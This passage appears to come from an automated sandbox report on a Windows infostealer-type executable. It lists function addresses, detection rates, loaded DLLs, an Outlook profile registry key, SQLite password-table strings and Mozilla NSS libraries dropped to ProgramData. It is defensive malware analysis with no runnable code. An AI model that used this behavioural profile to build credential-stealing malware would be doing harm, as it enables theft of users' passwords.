Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54AC00	0_2_6C54AC00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54542B	0_2_6C54542B
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E64C0	0_2_6C4E64C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FD4D0	0_2_6C4FD4D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C516CF0	0_2_6C516CF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DD4E0	0_2_6C4DD4E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E6C80	0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5334A0	0_2_6C5334A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53C4A0	0_2_6C53C4A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C500512	0_2_6C500512
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EFD00	0_2_6C4EFD00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FED10	0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C510DD0	0_2_6C510DD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5385F0	0_2_6C5385F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C513E50	0_2_6C513E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F4640	0_2_6C4F4640
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C522E4E	0_2_6C522E4E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F9E50	0_2_6C4F9E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C546E63	0_2_6C546E63
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DC670	0_2_6C4DC670
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C517E10	0_2_6C517E10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C525600	0_2_6C525600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C539E30	0_2_6C539E30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5476E3	0_2_6C5476E3
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DBEF0	0_2_6C4DBEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EFEF0	0_2_6C4EFEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53E680	0_2_6C53E680
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F5E90	0_2_6C4F5E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C534EA0	0_2_6C534EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C517710	0_2_6C517710
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E9F00	0_2_6C4E9F00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C506FF0	0_2_6C506FF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DDFE0	0_2_6C4DDFE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5277A0	0_2_6C5277A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F8850	0_2_6C4F8850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FD850	0_2_6C4FD850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51F070	0_2_6C51F070
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E7810	0_2_6C4E7810
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51B820	0_2_6C51B820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C524820	0_2_6C524820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5450C7	0_2_6C5450C7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FC0E0	0_2_6C4FC0E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5158E0	0_2_6C5158E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5060A0	0_2_6C5060A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FA940	0_2_6C4FA940
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C52B970	0_2_6C52B970
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54B170	0_2_6C54B170
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4ED960	0_2_6C4ED960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C515190	0_2_6C515190
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C532990	0_2_6C532990
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50D9B0	0_2_6C50D9B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DC9A0	0_2_6C4DC9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C519A60	0_2_6C519A60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C518AC0	0_2_6C518AC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51E2F0	0_2_6C51E2F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F1AF0	0_2_6C4F1AF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54BA90	0_2_6C54BA90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C542AB0	0_2_6C542AB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D22A0	0_2_6C4D22A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C504AA0	0_2_6C504AA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4ECAB0	0_2_6C4ECAB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D5340	0_2_6C4D5340
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EC370	0_2_6C4EC370
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51D320	0_2_6C51D320
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5453C8	0_2_6C5453C8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DF380	0_2_6C4DF380
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58AC60	0_2_6C58AC60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C65AC30	0_2_6C65AC30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C646C00	0_2_6C646C00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5DECD0	0_2_6C5DECD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C57ECC0	0_2_6C57ECC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C64ED70	0_2_6C64ED70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6AAD50	0_2_6C6AAD50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C708D20	0_2_6C708D20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C70CDC0	0_2_6C70CDC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C584DB0	0_2_6C584DB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C616D90	0_2_6C616D90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C61EE70	0_2_6C61EE70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C660E20	0_2_6C660E20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58AEC0	0_2_6C58AEC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C620EC0	0_2_6C620EC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C606E90	0_2_6C606E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C642F70	0_2_6C642F70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5EEF40	0_2_6C5EEF40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C586F10	0_2_6C586F10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0F20	0_2_6C6C0F20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C65EFF0	0_2_6C65EFF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C580FE0	0_2_6C580FE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C8FB0	0_2_6C6C8FB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58EFB0	0_2_6C58EFB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C654840	0_2_6C654840
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C60A820	0_2_6C60A820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5D0820	0_2_6C5D0820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6868E0	0_2_6C6868E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5B8960	0_2_6C5B8960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5D6900	0_2_6C5D6900
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C69C9E0	0_2_6C69C9E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5B49F0	0_2_6C5B49F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6109A0	0_2_6C6109A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C63A9A0	0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6409B0	0_2_6C6409B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5FCA70	0_2_6C5FCA70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C638A30	0_2_6C638A30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C62EA00	0_2_6C62EA00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5FEA80	0_2_6C5FEA80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C686BE0	0_2_6C686BE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C620BA0	0_2_6C620BA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C598460	0_2_6C598460
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C60A430	0_2_6C60A430
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E4420	0_2_6C5E4420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5C64D0	0_2_6C5C64D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C61A4D0	0_2_6C61A4D0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C5A3620 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C70DAE0 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C50CBE8 appears 134 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 00EE43D0 appears 315 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C7009D0 appears 121 times

Sample file is different than original file name gathered from version info

Source: i3NmF0obCm.exe, 00000000.00000002.1883978275.000000006C562000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs i3NmF0obCm.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs i3NmF0obCm.exe

Uses 32bit PE files

Source: i3NmF0obCm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C537030

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF6550 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_00EF6550

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: i3NmF0obCm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: i3NmF0obCm.exe, 00000000.00000003.1729483221.0000000021854000.00000004.00000020.00020000.00000000.sdmp, JJKJDAEBFCBKECBGDBFC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: i3NmF0obCm.exe	Virustotal: Detection: 58%
Source: i3NmF0obCm.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: i3NmF0obCm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF76E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00EF76E0

PE file contains sections with non-standard names

Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF8EE5 push ecx; ret		0_2_00EF8EF8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B536 push ecx; ret		0_2_6C50B549

Drops PE files

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

